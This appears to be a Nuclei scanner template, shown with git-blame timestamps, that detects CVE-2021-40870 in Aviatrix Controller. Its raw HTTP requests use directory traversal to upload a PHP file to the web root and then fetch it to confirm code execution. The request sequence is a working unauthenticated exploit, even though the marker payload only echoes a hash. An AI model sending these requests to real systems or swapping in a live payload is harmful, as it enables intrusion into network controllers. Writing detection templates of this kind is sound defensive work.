2021-09-30 06:57:47 +00:00
id : CVE-2021-40870
info :
2023-05-04 18:30:13 +00:00
name : Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution
2021-09-30 06:57:47 +00:00
author : pikpikcu
severity : critical
2022-05-17 09:18:12 +00:00
description : Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability.
2021-09-30 06:57:47 +00:00
reference :
2022-03-06 16:35:55 +00:00
- https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
2021-09-30 06:57:47 +00:00
- https://wearetradecraft.com/advisories/tc-2021-0002/
2021-09-30 10:20:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html
2021-09-30 10:24:26 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-30 10:24:26 +00:00
cve-id : CVE-2021-40870
2023-08-31 11:46:18 +00:00
cwe-id : CWE-23
2023-10-14 11:27:55 +00:00
epss-score : 0.90116
2023-10-17 17:52:26 +00:00
epss-percentile : 0.98434
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : aviatrix
product : controller
2023-04-12 10:55:48 +00:00
tags : intrusive,packetstorm,cve,cve2021,rce,aviatrix,kev,fileupload
2021-09-30 06:57:47 +00:00
2023-05-05 05:05:10 +00:00
http :
2021-09-30 06:57:47 +00:00
- raw :
- |
POST /v1/backend1 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-05-05 06:27:56 +00:00
2023-05-05 06:17:35 +00:00
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5("CVE-2021-40870"); ?>
2021-09-30 06:57:47 +00:00
- |
GET /v1/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
words :
2023-03-27 14:47:20 +00:00
- '0d95513363fd69b9fee712f333293654'
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200